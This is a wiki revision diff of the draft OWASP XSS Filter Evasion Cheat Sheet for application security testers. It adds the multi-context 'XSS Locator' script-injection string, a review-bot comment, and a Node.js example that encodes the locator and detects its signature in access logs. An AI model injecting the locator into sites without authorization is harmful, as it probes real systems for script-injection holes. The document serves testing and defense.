Difference between revisions of "XSS Filter Evasion Cheat Sheet"
= Tests = | = Tests = | ||
+ | '''XSS Locator :''' | ||
+ | Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this [http://ha.ckers.org/xss.html#XSScalc URL encoding calculator] to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably: | ||
+ | |||
+ | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; | ||
+ | alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> | ||
+ | <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | ||
= References = | = References = |
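Review bot: in the tip sentence of the added paragraph, "depreciated" should read "deprecated" (the <PLAINTEXT> tag is deprecated, not depreciated), and "often times" should be "often". The locator string is a single test payload that is split across two source lines at `//\";alert(`, with the `<SCRIPT>alert(...)</SCRIPT>` line as its tail, so wrap the three lines in one <pre> or <nowiki> block so the wiki renders it as one string and does not interpret the tags.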
Revision as of 20:01, 3 September 2012
DRAFT CHEAT SHEET - WORK IN PROGRESS
Introduction
This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.
Tests
XSS Locator: Inject this string; in most cases where a script is vulnerable and no special XSS vector is required, the word "XSS" will pop up. Use this URL encoding calculator (http://ha.ckers.org/xss.html#XSScalc) to encode the entire string. Tip: if you're in a rush and need to check a page quickly, injecting the deprecated "<PLAINTEXT>" tag is often enough to tell whether something is vulnerable to XSS, because it garbles the rest of the output noticeably:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
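The locator works because it carries a breakout character for every common output context at once (single-quoted and double-quoted JavaScript strings, HTML comments, closing tags). The following is an added example, not code from the cheat sheet or from RSnake: it shows the defender's side of the same test, applying context-aware output encoding to the locator string and checking that no raw breakout character survives, plus a log check for the locator's `String.fromCharCode(88,83,83)` signature. It assumes Node.js; the access-log lines are constructed for the example.

```javascript
// Added example, not code from the OWASP cheat sheet: context-aware output
// encoding applied to the XSS Locator string, plus a detection check for the
// locator in access logs. Assumes Node.js; log lines below are constructed.

// The locator exactly as given on the page (backslashes doubled for the JS literal).
const XSS_LOCATOR =
  `';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//";` +
  `alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>` +
  `<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`;

// HTML body or quoted-attribute context: escape the characters that can open a
// tag, close an attribute value, or start an entity.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: hex-escape every non-alphanumeric code
// point, so quotes, backslashes, slashes, '<' and line terminators cannot end
// the literal or the surrounding <script> element.
function encodeForJsString(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// Raw characters that would let injected text leave each context. Backslash is
// deliberately absent from the JS set: the encoder emits it as the escape.
const BREAKOUT = {
  html: /[<>"']/,
  js: /['"<\/\n\r\u2028\u2029]/,
};
function containsBreakout(s, context) {
  return BREAKOUT[context].test(s);
}

// Decode the JS-encoded form the way the engine would, to confirm the
// encoding is lossless (the application still sees the original value).
function decodeJsString(encoded) {
  return new Function('return "' + encoded + '";')();
}

// Detection side: String.fromCharCode(88,83,83) is a stable signature of the
// locator. The page recommends URL-encoding the payload, so percent-decode
// each line before matching or the encoded form slips past the check.
const LOCATOR_SIGNATURE = /String\.fromCharCode\s*\(\s*88\s*,\s*83\s*,\s*83\s*\)/i;
function percentDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}
function findLocatorHits(logLines) {
  return logLines.filter((line) => LOCATOR_SIGNATURE.test(percentDecode(line)));
}

// Constructed access-log lines (not real traffic): one percent-encoded hit,
// one plain hit, two benign requests.
const SAMPLE_LOG = [
  'GET /search?q=shoes HTTP/1.1 200',
  'GET /search?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F HTTP/1.1 200',
  "GET /profile?name=';alert(String.fromCharCode(88,83,83))// HTTP/1.1 500",
  'GET /about HTTP/1.1 200',
];

function summarize() {
  const html = encodeForHtml(XSS_LOCATOR);
  const js = encodeForJsString(XSS_LOCATOR);
  return {
    rawBreaksHtml: containsBreakout(XSS_LOCATOR, 'html'),
    rawBreaksJs: containsBreakout(XSS_LOCATOR, 'js'),
    encodedBreaksHtml: containsBreakout(html, 'html'),
    encodedBreaksJs: containsBreakout(js, 'js'),
    jsRoundTrips: decodeJsString(js) === XSS_LOCATOR,
    locatorHits: findLocatorHits(SAMPLE_LOG).length,
  };
}

console.log(JSON.stringify(summarize(), null, 2));
```

The two encoders are not interchangeable: HTML-escaping a value that lands inside a `<script>` string literal leaves the quotes and backslashes the locator relies on untouched, and JS-escaping a value that lands in an HTML attribute does nothing for `<` and `>`. Pick the encoder by the context the value is written into, and keep the percent-decoding step in any log search, since the cheat sheet's own advice is to URL-encode the whole string.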
References
Authors and Primary Editors
RSnake